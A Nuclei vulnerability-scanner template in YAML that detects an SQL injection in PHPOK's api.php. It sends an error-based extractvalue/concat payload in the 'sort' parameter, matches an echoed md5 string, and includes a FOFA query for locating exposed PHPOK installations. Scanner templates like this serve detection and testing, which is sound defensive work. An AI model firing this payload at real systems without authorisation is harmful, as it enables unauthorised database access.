nuclei-templates/vulnerabilities/other/phpok-sqli.yaml

22 lines
449 B
YAML

id: phpok-sqli
info:
name: PHPOK - Sql Injection
author: ritikchaddha
severity: high
metadata:
fofa-query: app="phpok"
tags: phpok,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{randstr}}))) --+"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'